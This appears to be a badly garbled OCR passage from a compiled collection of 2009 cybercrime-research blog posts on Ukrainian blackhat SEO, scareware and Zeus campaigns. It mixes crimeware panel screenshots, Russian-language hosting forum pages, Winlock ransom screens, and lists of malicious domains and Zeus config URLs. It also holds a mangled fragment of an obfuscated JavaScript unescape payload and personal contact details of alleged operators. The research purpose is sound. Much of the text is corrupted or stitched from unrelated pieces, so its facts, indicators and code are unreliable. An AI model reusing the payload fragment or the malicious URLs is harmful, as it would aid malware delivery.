/* At ts lest meg, so parse it */ 
tne ere: 


err * x parse(prote, proto->ine container, proto->ine cont size): 
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Fle Edt View Prokxt Bult Cetup Took Window memurty Help 


aif) x! 


ron nent 
waa wa Col 18 nis b6 
Bi srart| |] DL Wrdows ve Messenger | TG vsrOoweu-vew foru.... | GW darkode.com ix View toon... [['Go pret - Macroselt Vevwa_ OQ? -BegeEge nwo 
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Networking initialized 
Connecting to: 127.6.6.1:7778 with code: testmaster 
- 127.6.0.1:7778 


m Mute on/off ynnect 
client: t clients Cady) 


ing to: 127.0.0.1:7778 with code: t 
sted to 127.8.0.1:7778 


Mute on/off Reconnect 
List clients Chasic List clients Cadv> 


Mute on/off 
clients Chasic> ~ Cadu> 


Quit 


Number of clients 


Quit 
Number of clients 


Quit 
Number of clients 
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popyodiw .cn 
hayboxiw .cn 
peskufex .cn 
ridmoyey .cn 
cakpapaz .cn 


What kind of an ISP be maintaining a permanent Under Construction page and engage in 
Zeus and live exploit serving activities on the same IP as its web server? [4]EUROHOST- 
NET/Eurohost LLC is one of them: 


"person: Mikhail Ignatyev 

address: off. 1, 81 Frunze str., 
phone: +38 093 079 00 32 

address: Evpatoria, Crimea, Ukraine 
e-mail: ipadmin@eurohost. biz.ua" 
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Total: 


23156 


Day 


24 
23 
22 
21 
20 
19 
18 
17 
16 


- RB wOe THAN © © 


Installs 


ow 
i—] 


NO ee WH Se ee ee DY 


958 
353 
1331 
830 


(— i — ie — a — ee — ee — a — ee — a — 


3533 


Clicks 


102 
610 
617 
521 
731 
603 
879 
947 
1023 
1578 
1851 
2430 
3371 
4127 
956 


oo o oo c 9° & 


—) 


20346 324.44$ 


Money 


1.48$ 
8.08$ 
10.06$ 
7.78$ 
10.36$ 
8.61$ 
12.41$ 
13.02$ 
14.90$ 
24.42$ 
28.98$ 
42.10$ 
54.15$ 
70.26$ 
17.83$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


Dec, 2008 


AVInstalls AV Money 


oe oooceoso & 


3671 


0.00$ 
0.00$ 
25.00$ 
50.00$ 
0.00$ 
50.00$ 
25.004 
0.00$ 
50.004 
50.00$ 
50.004 
100.00$ 
125.00$ 
375.00$ 
100.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


1000.00$ 
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AV Chargeback 


0.004 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
25.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.004 
0.00$ 


25.00$ 


Refferals 


0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.004 


0.00$ 


Total 


1.48$ 
8.08$ 
35.06$ 
57.78$ 
10.36$ 
58.61$ 
37.41$ 
-11.98$ 
64.90$ 
74.42$ 
78.98$ 
142.10$ 
179.15$ 
445.26$ 
117.83$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.004 


1299.44$ 


CP :: Summary statistics 


Information: 


Information 


rrent 
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<=> © [hipyiracetozeranetiscan 


Result: 2/5 (40%) 


Contestant is given a Contestant modifies sample Sample is uploaded through 
sample virus or malcode in an effort to evade the contest portal and is 
in its original form antivirus detection scanned by AV engines. 
When antivirus detection 

rate equals zero, contestant 

proceeds to the next round 
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var SB = 

unescape 
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6ZGCLOFLOFS7 2S2GTAALG 147 HZGB%2E%V7 2%H 176 ELHA%G FVEIS2VS2I%2 OFZ a2 HL63%68%6 127247 3%2ESGCLOS ZOE 7 STH 
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SZHFL62%6.a%65Z63%7 4%2B%6 ETE 1260%65%29S27429%2 07 0Z63%6 147 4Z63Z68%28%65S2 9% 7% 70%09S 09% 99%69%66%2 8 
$2832 122 G472%29%2 GS 7D%2 O47 4S7 2% 7 9%2 OF 7 bS2 026547636 1 S6CS28%27%7 252 OS3d%2 OZHISACSS ISHISHNS ZO LHI 7 2% 
65%61%74%6534F%62%6 a%65%63%74%28%60%6 1%60S65 2042 0422%22%29%27%29%2 O47 0403%6 1 S7 NZOISZOBS28%O5S29%7 
DS7d%2 0%7d% Ba 09%69%66%2 032822 1%2 047 2%29%2 O47 DS2 OS 7 4% 7 2%7 9%2 O47 DS2 46547626 1%60S28S2 747 2%2 O43dS20 
BUSSUCSS IZNIZUNS2 OZN3Z72%65%6 1% 7 NZOSSUFZ62%6.9%65 463 S7 NZ2B%HESE 1Z60Z65%20%2 OF 2242242042 HZ224224%290% 
27%29%2 0%7 d%63%6 147 4Z63%68%28%65%29%7D%7d%2 BZ 7 AZ GAZ G9%H9ZHHS2 OS 282 1Z2 G7 2%29F2 GS7DL2 OST US7 2% 7942 
0% 7b%2 0%65%76%6 1260%28%2 727 222 O43dS2 GEASZUCSS SZHITHNZ 2OZH7 BG 5S 7 ALUF SH 276 ALO LO3S/ NS2BS22%22%2CS2 
%60%6 1260%65%29%2 7229%2 047 d%6 326 1%74%63%68%28%65%29%7DS7 042 OS7 0% 09% H9%69%66%2 02 28%2 1 S2 OS 7 2229%2 0% 
7D%20%7 437 2%79%2 O%7 bS2 265% 7636 1%60%28%27%7 242 OS 3d%2 OZHISACSSISHIZHNS2OZH7 BOS S7 ASHE ZH 246A SOS SOIST 
4%28%60%61%6d%65%20%2 0%22%22%29%27%29%2 0% 7d%63%6 1% 7 4%63%68%28%65%29%7DS7 de2 047% 00% 09%69%66%2 0428 
%21%2 0% 72%29%2 OS7D%2 O47 NST 2%7 9% 2 O47 D%2 065% 76%6 1460%28%27%72%2 OS3dS2 OZNSZUCZS SZNOZUNS2 OSH 7HSSZ NS 
4F%62%6 a%65%63%74%28%60%6 1%60%65%29%27%29%2 8S 7 d%63%6 1% 7 4ZHIZHB%2VFHSZ2IV7DS7 d%2 GF 7d%GaZGIS7 2%6S%7 
WZ7S272%GE%2ES7 2A29%3b% Gat 7 dz Gay Ga%G6%75%6E4H3%7 4ZHILGHFAGES2 GSS BLUA LHC TUBS? MS7US7 OZHNZG F277 ZGEZC 
S6F%61%64%28% 7826 dZ6C%2C%2 OF75%7 2%6CK29S2 GF 7 HZ Has GaZOIS7 447247 9%2 HL 7HZOHasOIS OPS 7 BLGdSHCS2CLGFS7 OS 
65%60%28%22E47 24S %5 4S22%20%2 S75 %7 226C%20 G2 046646 1%60%7 3%65%29%3D% 00% 09% 09% 78%6d260%20%79%65260%6 
4%282%60%75%60%60%29%3b% 0a% 0a% 09% 7d%2 0263%6 147 4%63268%28%65 42 9%2 O47 D%2 O47 2%65%74%75%7 2%60%2 043 O43D 
%2 0%7 d%8a% Ga%09%7 2265274%75S7 2%60%2 047 84602604 20%7 246547 347 046 FZ60%7 346554246 FZONS7 9S3DS Bas 7d%Hay% 
83%66%75%60%63%74%6 926 FZ60%2 E41 ZUNZUFZUZZUNZS 3% 7 NS 7246526 1260S5326 127 646542846 FS2C%2 OZ 6E%6 126046 
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Windows 3a6nokupoBaH 


Nonbitka NepeycTaHOBHTh DMB « noTepe 
BaXKHOM MHDOPMALIMH M Ha 1K JoTepa. AkTHBauHa 


Trojan.¥Winlock can remove itself in two hours after launching. Users who don’t want to wait 
that long can use the web-form to enter the text of the suggested SMS and get the unblock 
code. 


SMS text: 4129800256 


Activation code: 
Try 4420864 or 7829248 


23158 
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Windows sa6nokvupoBaH 


4117877372 


oy 


-BUTe CHCTEMy MOMET NDNBECTH K NoTepeE 
UMM MH HSPYWEHMAM PadoTe! KOMMbNHTepS 


~rieo 
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3616160 PA3PEUIEHHE HA PABOTY 
HHOCTPAHHOMY TPAXK]JAHHHY 
HJM JIMULY BE3 TPAXKIAHCTBA 


Copua77__ Ne 085 
== 


Mamunua 

‘ui 

0 Caq \ 3616160 
Mata poxgexus M1977 
TpaxgaHctso TagKvkvcTaH 
DioxyMeHT 

ynocr. nusHocts 


Bug aertenbxoctu PasHopa6ouwnni 


3616160 
AeicteutenbHo po F§.2009 
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Abdulla Hosting simple, machines forum 


Mapre 14, 2008, 021/05:50 pm — 


Loteo Moxanceats, [octp. Nomanyhicta, Te ww Da 
[ [Haeceras 2] Bom | 


Boam 


Mosocre) Heese youre!!! VPS copsape: we Gare texmonorms MIN. Ryewee COOTHDEEENEe WeHH HK HOECHR De scrote ued mebormaunel of ematrecs 7) [  —— ie 


Tyee to 


Kaa 


x mane 


Howoct# 


Be HOBO TH HaUMTO CepEnca, CheuMarentee NpeAnOerem Ht T.n 


Xoctwour 
, COARMERIO C BHPTYANDHEE XOC TYEE OM 


Dedicated/VPS copwopes 
Rorpoce, Comsaeae ¢ OGCNY=HBBeTEM, HAC TPOSeros 1 PASOTON BENeHRE H OMLENeHHRK HDT ArH Cepeepoe 


Dlovsorers 


COPOSe, COMDSORIO C LOMEreRie HHeeraedt 


Npeanomoreen © Cootuereeh 
BUH MDELNOK OHH, NOWENseeTR 1 DaMeuseeR NO PaSoTe HAWETO Cepence OCTaENMITe & DTOH TENE 0 Tex 
Por 0 Cooterereeh 


KOTOR HET ER OTHECTH K Bree YKaRerenes Tema 


Abdullo Hosting - Hexpopmaaeconmn wernt p p> 


Cratectvna G@opyna 


6 93 Tew 


unerene: “e 


32 Nore 08st ened, Nocnes-es) Nome sceatens: Vempirenok 
pece” ( Mapta 12, 2008, 11:01:48 om ) 


270 Coobu 
2 Nocmearee 


Norn sronarens Online 


2 Tocten, 0 NonssoeaTeneA 


co] 


Maccutyn Orkiew ceroane: 2. Maccreryn Onkne: 10 (Aarycta 13, 2007, 11:01:05 om) 
BOAT (tefeem mapore?) 


on, Von pony s090TERN: Naponw: NpononssterpHoc te coccrs (8 menytax);: Sanortiecto: . 
2 feo 9 Bohm 


23161 


At eurohost.biz.ua (91.212.65.5) we also have parked [5]123-service.ru, serving a [6]deja-vu 
account suspended message - "This account has been suspended. Either the domain has been 
overused, or the reseller ran out of resources." as well as [7]ramshanabc.ru, with another 
account suspended message despite its previous involvement in Zeus crimeware campaigns 
in January, 2009 (ramshanabc .ru/ferrari/main.bin; ramshanabc .ru/ferrari/main.bin). 


Besides these domains, several others, again registered to kirilboltovnet@yandex.ru are 
known to have been maintaining running Zeus crimeware campaigns as well: 


grafjasqq .ru/kiew/kiew.cfg 
heliskamm .ru/kiew5.cfg 
mamaloki .ru/dir2.cfg489 
mamaloki .ru/kiew3.cfg 
nionalku .ru/dir5.cfg 
nionalku .ru/kiew6.cfg 


Still not convinced in how malicious their intentions really are? The phone number (+7 
928 7867612) used in the registrations of these domains was most recently used in a 
[8]spammed Zeus crimeware campaign impersonating Western Union. 


. http://ddanchev. blogspot .com/2009/05/gaztranzitstroyinfo-fake-russian-gas.htm 


http: //google.com/safebrowsing/diagnostic?site=AS :29371&hl=en 


_nttp://tuitter..con/arbornetworks/status/1673676720 
| http: / blog. fireeye..con/research/2009/08/bad-actors~part-6-surchost-Aic. ha 
http: //google.com/safebrowsing/diagnostic?site=123-service.r 
_http://ddanchev. blogspot. con/2008/01 /rins~fake-account~suspended-notiices tal 
 ctpe://zeustacker bute, ch/aoniter pip Thoot-reashanabe 4 


http: //www.dslreports.com/forum/r22374680-Spam-Western-Union-Transfer-MTCN- 1848485571-ZIP-FILE-VIRU 


5.6.7 From Ukrainian Blackhat SEO Gang With Love - Part Two (2009-06-09 23:03) 


DDanchev 
Rained 
On My 


Scareware 
Campaign 
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ATED HOS 


—— = EVERTTIONG YOU NEE 
aeeeeeee = FOR INTERNET ACTIviT 2 
sr SWORE C ma \f 


WRSHORE CAAR 


Offshore Domains 


Professional bullctproof Service 
Eerie 
miam 
a= s 


Accomemodeton of servers in: Malaysio. Heng Keng. Paname, Conte Bice, 


Offshore Web Hosting 
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ner 


Pocennee 


Tremeese ves 


Oedicated copeepa 


- 


( er i 


ws 


Breoamew. Asay! 


Dcesen Gecnnatio + Ore £0 15% fo aoe 
meneca, EO 


NOCMEAVE HoEOc TH GB 


RESLLER TE 


ODOC -ataed ne onpme 


tiniest intra 148 DON Toes pceaie eed: poate: 


RESELLERS 
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Abdulla Hosting 


Mapra 14, 2008, 02:05:04 pm 


r Abdulla Hosting - Uewtp Cratrectvax 
Bcero momscearenei: 2 CROAHOO KOMECTRO MORE NANDIORATENE B ASH: 0.15 
Boero cootuserest: 270 Cpeanee Konmreectao CootuseHst © AgH: 1.26 
Bcero rem: * Cpeanee KomrecTRo Tom 8 Ago: 0.47 

® beoro areropnih: 1 @® ecero pamence: 16 
Nore sce@areneh Oriiew: 2 Nocnegnith nore scearens: Vampirenok 
Maxcrery Onkne: 10 ~ Asryeta 13, 2007, 11:01:05 pm Cpegnee KoreecTeO Momesce@aTeneh Oriine 8 AgHe: 1.43 
Ceroaxa Onkne: 2 COOTHOWOHI® MY ~ NoeHUH! 1:0 


Nepaar aecarne 


10/204 T ONOA Nepeas aecaina paasaence 


Support 164 Dedicated/VPS cepoepe | 7 
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Abdulla Hosting 


Moapre 20, 2008, 02:30:58 am 


RoSeo nomanceate, Focty. Nomanyicta, eohgiie mw dapercioreyiitecs. 


Heese Coatmereh Rei c era 
BEe® HOBO TH HaWETO CepEnca, CheUMareHtee NPeANOweret H TL, commdps She 3007, 9130126 om 


nose RoOroLor ory (evn 
a0 z a» (peaemanee. 
Borpece, COARORIO C DHPTYaANeHEE KOC THEE CO Aoryere 26, 2007, 04)19:87 pen 


Dedicated/VPS copwopes Bocnenqed emer or Soopers 


© Crane MapOne NommaCe ATER... 


_Berpoces, Consaremie ¢ OSCRYMemeEN, HACTpOFKOH 1 PASOTOR euReneHHEEK M OULENtERE BHpTY EMH Cepeepo® ae Mosépe 49, 2007, OFA 7128 am 


Doosan 
ROMDOCe, COMFEHORIO C AOMEHeRIOT NMeMBeNt 


Npesnomoreen 
Baw MPeLNOR OEHHA, NOWENseTA HH aMeuareTA NO PaSoTe HAWErO Cepencs OCTaENmiTe & 3TOH TENE, 


Pomoe 
Borpoce,, KOTODe HED ER OTHECTH K BrAUeyKasareees TeMaM 


2 Hosting - Vabopmaspeoreint uertTe 


269 Coobwornit © 97 Tex 07 30 Mom s08steneh. Nocneaess Mone rceaTtens: Cartas 
2 een cooSuyerese: “Creme mapenn nome sonaten...” ( Hosen 19, 2007, 09:17:28 am) 
cocKuyerent Ha Gopyne 
(Roapeéeas cratnetca) 


1 foots, O Nomsceareneh 


_ Maccomyr Online ceroama: 1. Macceryn Onkne: 10 (Aarycta 13, 2007, 21:01:05 em) 


i. amore 


erence coccwm (@ munytax); 


a >_> Powered by SMF 1.1.3 | SMF © 2006, Simple Machines LLC emer” 4 WS, eon 
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Adalt.BY 
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Date 

26.02.2008 11:09:54 
24.02.2008 16:54:35 
24.02.2008 08:28:09 
24.02.2008 07:34:18 
23.02.2008 07:40:36 
23.02.2008 07:38:54 
23.02.2008 07:34:26 
20.02.2008 08:15:24 
19.02.2008 21:35:12 
17,02.2008 13:51:48 
16.02.2008 23:58:17 
15.02.2008 18:29:33 
14.02.2008 12:12:06 
14,02.2008 11:07:40 
14.02.2008 07:27:23 
12,02.2008 11:34:04 
10.02.2008 11:25:14 
09,02.2008 04:56:36 
08.02.2008 17:47:25 


08.02.2008 03:30:41 


(Ebay, MSFT) 


Risk 
all 
all 
all 
ell 
atl 
all 
ell 
ell 
tll 
all 
ell 
ell 
ell 
all 
all 
all 
tll 
all 
ell 


Origin Findings 

nfa Trojan.DL.Agent.KTG, Trojan-Downloader. Win32.Agent.bnm, Trojan Horse.. 

nfa TrojanSpy.Broker.A, Generic.dx, TSPY_BANKRYPT.X, Trojan-Spy.Zbot, New.. 

nfs TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.g.gen, BKDR_AGENT. SHH, Trojan-Spy.Zbot 
n/a TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.g.gen.|, TSPY_BANKRYPT.X, Trojan-Spy.Zbot 
nfa Trojan-Proxy.AgentisdS, Trojan-Proxy. Win32,Agent.lv, Backdoor. Trojan.. 

n/a Trojan-PWS.Tanspy, Trojan. Win32.Small.lh, Trojan. Satiloler.6, Generic.dx.. 

n/a Trojan-PWS.Tanspy, Trojan. Win32.Small.lh, Trojan. Satiloler.8, Generic.fe.. 

n/a Trojan.PWS.2bot.D, Trojan-Spy. Win32.Zbot.n, Spy-Agent.bw.gen, TSPY_BANKRYPT.X.. 
nfs  TrojanSpy.Z2Bot.Gen!Pac.3, Spy-Agent.bw, TSPY_ZBOT.BK, Trojan-Spy.Zbot 

n/a TrojanSpy.ZBot.Gen'!Pac.3, Spy-Agent.g.gen, TSPY_ZBOT.AY, Trojan-Spy.Zbot 

nfa TrojanSpy.Agent. WEQ, Spy-Agent.g.gen, BKOR_AGENT.ACR, Trojan-Spy.Zbot 

nfa TrojanSpy. ZBot.Gen!Pac.3, Spy-Agent.d.gen, TROJ_ZBOT.R, Trojan-Spy.Zbot 

n/a Packed/Upack, Downloader, Generic Downloader.y, TROJ_DLOADER. VAK 

n/a Trojan-Downloader. Win32.Agent.bnm, Downloader, Generic.dx, TROJ_AGENT.ZMB.. 
nfs Trojan.DR.Cimuz.Gen.1, Packed, Win32.PolyCrypt.d, Infostealer, PolyCrypt-Packed.. 
n/a TrojanSpy.ZBot.Gen'!Pac.3, Spy-Agent.bw, TSPY_BANKRYPT.X, Trojan-Spy.Zbot 

“ Trojan Horse, Trojan-Spy.Bankject, Infostealer.. 

n/a Trojan.DL. Small. VIC, Trojan-Downloader. Win32. Wintep. aj, Downloader, Generic. 
| Trojan-Spy.Bankject, Infostealer, not-a-virus:AdW are, Win32.BHO.fh 


n/a Trojan. IncPack.Gen!Pac, Trojan-Spy. Win32.Broker.|, Spy-Agent.g.gen.. 
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PROLEXIC 
- How A Distributed Attack Works © Prolexic Technologies 2006 


Attacker’s 
Computer 
Gq Hacked computer 

J to hide attacker's 


identity 


Target's web 
infrastructure 
fails, making the 
target 
unreachable for 


The attack overwhelms 
ISP defense layers 


Tens of thousands 
of Zombie 
computers 

attack the Target 


, ee 
/ Internet SS -= uJ 


‘ 
‘ 
‘ 
me 2nd hacked computer 
re to hide identity 
3rd hacked computer to 
hide real source IP address 


[1038] 


Attacker 
Instructs 
Zombies to 
attack selected 
target. 


Cumulative R&D investment since 2000 


a 
c 
a 
= 
at 
“ 
2 
o) 
re) 
7o 
“ 
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It seems that the portfolio of [1]redirectors using my name part of an ongoing [2]Ukrainian 
blackhat SEO is expanding, with seximalinki .ru/images/ddanchev-sock-my-dick.php, as the 
latest addition. This brings up the number of redirectors to three, at least for the time being: 


¢ seximalinki.ru/images/ddanchev-sock-my-dick.php - active - 74.54.176.50; Email: Hip- 
pacmc@land.ru 


¢ seo.hostia .ru/ddanchev-sock-my-dick.php - active - 213.155.2.37 


¢ HiDancho.mine .nu/login.js - active - 64.21.86.16 


2)4 200 nTTe i¢-the-boss.com fj hire 4,906 text/html 
| 

S)e x HTTe 6-the-boss.com fimagesimenu. ts 4 ac pbc abo! 
4 x kemry-dek. phe text 


‘8 me HTTP homeandoffkefun.com fi 


Zhkey=sch9eS9cip= | S$ text/hin 
\s)9 200 HTTP antinsiwarcoriinescannervS.com = fi/?kx Bback= KID TOSTOONQQHMI IDO 13,535 text/html 
@10 20 HTTP antinshwareoriinescannery3.com  /Ifingiiquery.ts $5,746 applications. 
Wu 200 =O HTTP antinshwsreoriinescanneryS.com {i fiengiiquery-int.js 681 appheation/.. 
) 
13 20 = OHKTIP antienshvareoriinescannervd.com i fiengfistfile.js 13,220 apphcatiory/.. 


Let’s dissect the latest campaigns, including several related ones not necessarily serving 
scareware, moreover, let’s also establish a connection between this gang and the [3]ongoing 
hijacking of Twitter trending topics for malware serving purposes, shall we? 


The redirector takes the user to antimalwareonlinescannerv3 .com - 83.133.115.9; 
91.212.65.125; 69.4.230.204 - Email: immigration.beijing@footer.cn where [4]the scare- 
ware is served. 


The campaign is also relying on three more scareware domains antimalware-live-scanv3 .com; 


antimalwareliveproscanv3 .com ;fastsecurityupdateserver .com, with ns1.futureselfdeeds 
.com ensuring that the rest of the portfolio remains in tact : 


2320 
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BorderWare 


ReputationAuthority print close ¥) 

yahoo.com Reputation: 
@ Good 
Total IPs: 5000 (all) . a 
3 

SPF record: Not Present 

IP Address Information Domain/IP Overall IP 
66,163.168.190 YAHOO yahoo.com |uS MMM] | 92% | 8% J] | 95% | 5% 
66.218,67.218 YAHOO! yahoo.com |uS MMM | | o2% | o% PT] | 95% | 5% 
209.131.38.235 | YAHOO yahoo.com |UuS MM |] | 91% | 9% [| | 94% | 6% 
69.147.64.118 YAHOO yahoo.com |US MM | | s2% | s% QP] | 95% | s% 
66.218.67.59 YAHOO! yahoo.com |uS MMM] 92% 8% ff ] | o5% | 5% 
209.131.38.211 YAHOO yahoo.com jus MMM |] | 91% | o% 9] | o5% | sxe 
209.131.38.234 / YAHOO yahoo.com |uS MM |] | 92% | s% [| | 95% | 5% 
66.163.168.145 “YAHOO yahoo.com |uS MMM] | 91% | 9% QC  ] | 95% | 5% 
66.163.168.144 “YAHOO yahoo.com |uS MBM | | 91% | 9% [| | o5% | s% 
209.131.38.209 YAHOO yahoo.com |uS MM |] | 92%  s% [|] | 98%) s% 
66.218,.67.60 YAHOO! yahoo.com |US | | | o2% | se [  ] | 95% | 5% 
209.131.38.240 YAHOO yahoo.com (uS MMM | | s2% | s% [  ] | o5% | s% 
66.163,168.131 YAHOO yahoo.com jus J |] | 91% | o% J] | os% | s% 
66.163,168.136 YAHOO yahoo.com |US MB] | 91% | 9% [| | 95% | 5% 
66.163.168.135 “YAHOO yahoo.com (US MMM | | 1% | o% [-  ] | o5% | s% 
66.163.168.134 YAHOO yahoo.com |uUS MM |] | o1% | 9% [FO] | os% | 5% 
209.131.38.212 YAHOO yahoo.com (US MMM | | 92% | s% [| | 95% | 5% 
66.218.67.213 YAHOO! yahoo.com |uS MMM | | 90% | 10% [ ] | 93% | 7% 
66.163.168.132 YAHOO yahoo.com |uUS MM | | s1% | o% P| | o5% | s% 
68,142,237.94 _INKTOMI CORPORA yahoo.com (US MMM | | 90% | 10% Mf] | 94% | 6% 

| . I = I Se, i | l 

[1047] 


23175 
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hotmail.com 


BorderWare 


ReputationAuthority 


Total IPs: 5000 (all) 


SPF record: 


IP Address 


65.160.234,70 
65.55.34.201 
65.55.116.73 
65.55.34.72 
65.55.116.8 
198.73.213.152 
65.55.111.136 
65.55.34.200 
65.55.111.73 
65.55.111.137 
202.58.38.96 
65.55.116.74 
65.54.246.99 
65.55.34.9 
65.55.34.8 
65.55.111.71 
65.55.34.137 
65.55.34.136 
65.55.34.71 
65.55.116.9 
65.55.34.199 
65.55.111.135 


IP Address Information 


| ISP 

CONVIO INC 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
DURHAM NET INC 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
HOSTWORKS PTY L 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 
MICROSOFT CORP 


getactive. 
msn.net 
msn.net 
msn.net 
msn.net 
telnetcomm 
msn.net 
msn.net 
msn.net 
msn.net 
hostworks. 
msn.net 
hotmail.co 
msn.net 
msn.net 
msn.net 
msn.net 
msn.net 
msn.net 
msn.net 
msn.net 


msn.net 
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us 


Domain/IP 
Good | Bad 
98% | 2% 
89% | 11% 

| 88% | 12% 
89% | 11% 
88% | 12% 
89% | 11% 
88% | 12% 

(89% | 11% 
88% | 12% 
88% | 12% 
99% | 1% 
88% | 12% 
89% | 11% 
88% | 12% 
89% 11% 
88% | 12% 
89% | 11% 
89% | 11% 
90% | 10% 
88% | 12% 
89% | 11% 
88% | 12% 


n{n{s|0{=|5}s|5}5|8{5/8{s}5}5}5}5)5}5)5\5\5), 


Print Gap Close x 
Reputation: 
™ Good 
@ Suspect 
™ Bad 
Overall IP 
Rep. Good Bad 
| Be oe 
EE) | os6% | 4% 
LL ]| os% | s% 
[) | s6% | 4% 
LCL ]| os% | s% 
WM) | 27% | 73% 
Lj | os% | s% 
LT) | s6% | 4% 
L._]| 9s% | s% 
— | os% | s% 
[_] | 100% | o% 
[1] ose | s% 
Ms] o4% | 6% 
Eo) | s6% | 4% 
TL) | s6% | 4% 
E ]| s6% | 4% 
L.]| s6% | 4% 
| 6% | 4% 
L_]| s6% | 4% 
|| os% | se 
L.]| sex | a% 
1 os% | s% 
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defu es (13.12.07) | 
Ds. eo yrs 
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[ Peaaxmmonate | DeaoGencn | Csoootme cramacniy | YanreTe | 
getla uk (14.12.07) 


COPY GHT #887 FOR CERT "CO SeeteEe 
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Cravnormea Honee seaanee Hactpeten 


x 
Crp UAL ana ocex crpar Masx Bc Ceroana —|Maxcrmyrs m 
Sa Adcounties [fata //agtdcomVateg/eerviews | Hea dC 4 10000 4 
Penocmpceate | Dogootewmery | Cioocens cramectecy | Uaaneh 
Abas 
MB Buskine Faso 
= ho [_____hipinaanratbonn i Cd 


COPY GrT #287 SO" CENT (OO SeeSeHe 
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Cratmormra Hoee seaanne HaeTpedew 


floGasnenne nosoro sananna 


Hoowa URL 

Busepyre crpany Dina goGennereta ceeaure UAL 1 rasan me cr per 
nal Me nhemarre na nmorny “Slodseure” 
Ect Mank He HYMEH, TO MPOCTO OCTaeTe None MYCTDM 

_ Apbaswre — Dodsncereese meen Ogayt sorpyeateca no poem tedipareme crpsnam. 
Uxe studpaoninese crpana 
Abana UAL bttpoi 
Burkina Faro 
Bane Maan Mipol 
Brant 
Denmark: Aobsent» 
Omos 


Texgush cnucox aapecos (c manxamw): 


Ouncture. Hitp://rokarunetoojan He grasan Yaanut 
biter //ojan net/deakes. exe hip//epeustakphp = YAannt 


Maxcurannite HOSMOMNOS WCAC 3arpPYysOK SaqanKa 
Eom crour 0, sarpysna MpeT Ges orparecutreat 


10000 


: 
_ COPveger #88) FOF CERT ico Geeeeee 
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ntti 


Nip. 
itp. 
nitp 


©) CO) —~4) OC) Ga) h 


http 
10 Pitty: 

11 fatty 
12 fhttp-/ 


14 fhttp.// 
15 fhttp: 
16 fittp: 
17 fittp 
18 fatty i 


http: 
ULL 
itp 
Nitp. 
ntti 
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ntti 
http: 
http 
riih 
itp. 


HALBS SSB VS Xs RRBs 


http: //newsa 


Pity 


itty news al 
into //news al 
itty //newsal 
news al 
news a 
newsal 
news al 
news af 

pwsal 

CW at 
13 fhttp/newsa 


He Ws a 


new 


4-4. 2-3- Fd i 
4h-4.2-3- 8s i 
news 909 
19 [http /newsal 
20 fhttp//newsal 
21 fhttp-//newsal 
http: //inewss 
news a. i 
ews a 
De ws a 
epee oi 

ws a 


EWS ol 


Hews aK 


news 


eS at 
pews a 


De WS 


into: //news al 
intto: “news al 


te 


* * * . * . s . Vis 
SeeeserseEetees 
> > > |= [> fo >  P 
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sseesesecsEeEseeece ts 
> > [> |p | > > > & & bf fo 


. Vis * * . * G ‘s “ * 
SirceeecEe > 
Trrrerere rr? ff 


ae clastmod [+ ]nst: 


Orr Piepet> TIRE) 
onvanna-hansen-wiki him! 


onvthe-hangover-cast html 
om/you-tube html 
om/in-plain-sight. htm 
OTT} 3-C © ebri - aT) 
OFT rel-reSi ero Tiirr 


ornvowyneth-paltrow-husband htm 
or/el-nais-ber| S oni htm 
onvig-glance htm! 
om/operation-tiger html 
om/craigslist-detroit htm 
om/addicting-games him 
om/nationaldoughnut-day_ htm 
om/gambar-naruto. hir 

orrig ot Pot AT UP -live-s4 Parry Fi iT) 
OfvOnbt-SiO ites 
onvmichael-hutchinson him 
onv/brownish-songbird himl 
om/revolver-musique him! 
om/boyd-coddinaton-death html! 
om/auschwitz-concentration-camp. htm 
om/tagged-ine htm 

om/geert-wilders htm 

orrv/nr-puftl-n-stult him 
onvlakers-vs-magic himl 
on/desmond-hatchett him 

0 ate-morgan, html 
om/kennedy-center. htm! 
om/cy-young htm 
om/bbc-weather-manchester him 
omlakers-vs-magic-game nim 
om/muse-fickets him 
orv/grang-old-days-st-payl-2009 html 


0 ell-2 html 


premiumlivescanv1 .com 
advanedmalwarescanner .com 
advanedpromalwarescanner .com 
antiviruspcscannerv1 .com 
antiviruspremiumscanv2 .com 
malware-live-pro-scanvl1 .com 
malwareliveproscanvl1 .com 
malwareliveproscannervl .com 
malwareinternetscannervl1 .com 
anti-spyware-scan-v1 .com 
antimalwarescanner-v2 .com 
freeantispywarescan2 .com 
antivirus-scanner-v1 .com 


internetotherwise .com 
macrosoftwarego .com 


world-payment-system .com 


65/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/2/2009 monthly 
6/2/2009 monthly 
6/2/2009 monthly 
6/2/2009 monthly 
